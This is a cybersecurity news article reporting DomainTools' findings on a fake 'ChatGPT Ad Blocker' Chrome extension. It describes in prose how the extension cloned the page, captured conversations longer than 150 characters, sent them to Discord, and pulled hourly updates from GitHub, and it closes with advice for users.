A malicious browser extension disguised as an ad blocker for ChatGPT has been identified as part of a data harvesting operation, raising concerns about emerging scams targeting users following recent changes to OpenAI’s platform.
According to DomainTools, the extension, titled ChatGPT Ad Blocker, was available on the official Google Chrome Web Store as recently as February 10, 2026. While marketed as a tool to remove advertisements, it was instead designed to monitor user interactions with the ChatGPT interface and capture sensitive conversation data.
How the Extension Captured User Conversations
Investigators found that the extension used a technique known as cloning the DOM, creating a replica of the webpage content while filtering out visual elements such as images and styles. This allowed it to isolate and extract text, including user prompts and responses generated by the AI.
The extension flagged text exceeding 150 characters and transmitted entire conversations to a private channel on the messaging platform Discord. A bot, identified as Captain Hook, intercepted the data and stored it for later access by attackers.
To maintain persistence and avoid detection, the extension checked a GitHub file every hour for updated instructions, enabling attackers to adjust their methods remotely without alerting users.
FCRF Launches Premier CISO Certification Amid Rising Demand for Cybersecurity Leadership
Links to Developer and Wider AI Ecosystem
The developer behind the extension operates under the online name krittinkalra and has been linked to AI platforms such as Writecream and AI4ChatCo, both of which reportedly have more than 1.5 million users. While there is no confirmed evidence that these platforms are involved in data theft, the association has raised additional concerns.
DomainTools noted that the activity appears to be taking advantage of OpenAI’s introduction of advertisements for free tier users. The extension’s stated purpose of blocking ads may have been used as a pretext to distribute malware designed to harvest conversation data, including prompts, metadata, and structural details.
Investigators also observed that the developer’s account had been inactive for five years before reappearing with the extension. It remains unclear whether the account itself was compromised or deliberately used to distribute the tool.
Data Exposure Risks and Broader Implications
Further analysis linked the operation to several suspicious websites, including blockaiads.com, openadblock.com, and gptadblock.com. The stolen data was found to include not only chat content but also technical metadata and information about the user interface.
Security researchers warned that such data collection poses significant risks, particularly for users sharing sensitive personal or business information through AI platforms. DomainTools advised users to rely on official platform settings to manage advertisements rather than installing third party tools that may act as intermediaries.
The findings underscore how quickly malicious actors are adapting to changes in widely used AI services, exploiting user behavior and platform updates to gain access to private data.